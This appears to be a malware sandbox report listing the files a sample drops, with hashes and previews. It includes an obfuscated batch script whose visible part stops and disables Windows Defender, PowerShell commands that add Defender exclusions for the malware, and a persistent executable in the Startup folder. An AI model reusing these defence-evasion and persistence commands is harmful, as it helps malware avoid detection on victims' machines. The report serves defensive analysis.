                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hvfzt5y.uov.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5stcexqa.mjh.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dci5vt12.o2u.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eiuvcs12.lov.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h00p3kfi.mal.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpq1hxdx.5bu.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_julunsxd.nk1.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfhky3a4.nkp.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3nafo4w.jjh.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdaahtvp.wcr.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qobie0yt.3py.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxbwq3x5.3vw.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skdig1ki.bhc.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skw0nnic.ute.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3mj0yao.kun.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsyzh3ek.kz4.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yaftruwr.5iy.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yprbbuxu.tzk.psm1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1053624
                                                                                      Entropy (8bit):6.324012336357782
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:M1VPzxljWH+fdg8yXresMdJFBwA48ayWMWPX6+Pqpn7PJuhgqCakBu7:yzxljW+g3Xub48ayWlK+ipnLJuhVkA7
                                                                                      MD5:44696D252000850D3EA71D9AE238AEDC
                                                                                      SHA1:1FB61A1DF500F9025641526CB4013D555B129A84
                                                                                      SHA-256:1B39D6BF218028DFE7BC8254A3B1682804E9BF05B8298C708C318236F64AD986
                                                                                      SHA-512:E1115A0A70B6D532633C1C60733A2AEBBDC9E14863DEAEC7F6E15604C20F9F3CE3D36132EC2B814A4C774B25A6C4C8CCAD4003724B98ABEAD2BE3F752B9D6314
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..............0.................. ... ....@.. .......................`............`.....................................J.... ..D....................@......N................................................ ............... ..H............text........ ...................... ..`.rsrc...D.... ......................@..@.reloc.......@......................@..@................4.......H.......D...$.......7...hZ...................................................S..`.@..a...B.?.LG........m.*..mLH`|.....q.......l...'..H..y....h.3..e...-t..m.=.Z.l2..~..Cw.X....3.. .............r$$r.4...h.\.D..N........p..Q.M#z_.t...)....W.i{&~>.i.rZg.g..WX.R.."*.|f....k....A.a............N..).-u.5.8].................!V.......2.<.'.{.f1.b.yD..O`....$(..... ...]>n.&.....o....`..+.N......2...x....N...V....._D/.. .NK..D.F....6..<...#g.....$.6.#%.K..`.1....V.l.3.[,..v
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe:Zone.Identifier
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.4_2TT6xL.20210915085355.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5827
                                                                                      Entropy (8bit):5.412577102742799
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZR/UNtNqDo1ZPnZG/UNtNqDo1Z1J8v8B8jZxm/UNtNqDo1ZXw8R8R8EjZX:Zul
                                                                                      MD5:40CBECAB20EB48D8E8BD4A8B9E038195
                                                                                      SHA1:C47009B2981B517667FCE7B4D9CFFEC19805A887
                                                                                      SHA-256:048BCF294C886E073FEE45619FB453419E6725E3C619FF1143BF774B753FB3C8
                                                                                      SHA-512:067F5080D1844EB60E16D1DC01AC4E6C0905A954B13B12F9A41E6A4AEC28A29E7F66491CAED2261AA62D9349729D4245738DFBE22B2ACF85C8DDBE170A5F04AB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085358..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..Process ID: 3688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085358..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085625..Username: computer\user..RunAs User: D
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.5Md4gwAb.20210915085436.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.342423606554998
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZh/UN7nqDo1ZdlPZL/UN7nqDo1ZOqVA0cA0cA0+ZG:K00K
                                                                                      MD5:F1DEB865A2CB688F69D755D2E60D1FB1
                                                                                      SHA1:F77A4E9C57F0A8CE1DBBE63F78A7530A61431DE7
                                                                                      SHA-256:C7CA8EAFBA30436EB87FE12261754B023CA52A63F54AE76D154691AA023A5B68
                                                                                      SHA-512:03250D675F5761087F0D2BC491A01E1165847F52F5B20187D9E9542BFFCF593FC7A2C27F63720782B371D0EB8AAEE9D59BA8ED58046FCA53B132A2A9E6F9842F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085439..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 3016..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085439..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.65F6kbZc.20210915085351.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5827
                                                                                      Entropy (8bit):5.412654176154929
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZ9/UNtWqDo1ZLnZX/UNtWqDo1ZUJ8v8B8jZE/UNtWqDo1Zqw8R8R8FZ6:4
                                                                                      MD5:699F622695DE9265C458774ED5517E22
                                                                                      SHA1:651C5B219A21C7DB14DF7B6C722E6ECE45435668
                                                                                      SHA-256:893EF02A486B4286153A6613521EF5AC67B41838E1919C5386C6069C34063637
                                                                                      SHA-512:2C8787CC275EB7230A22623EECEE0BE20FE08DFC40E2379530A868FDA6954405429118647ACB667669AD7D525C651815A40B77B6CAE72D4F564EA8C7068CD7DB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
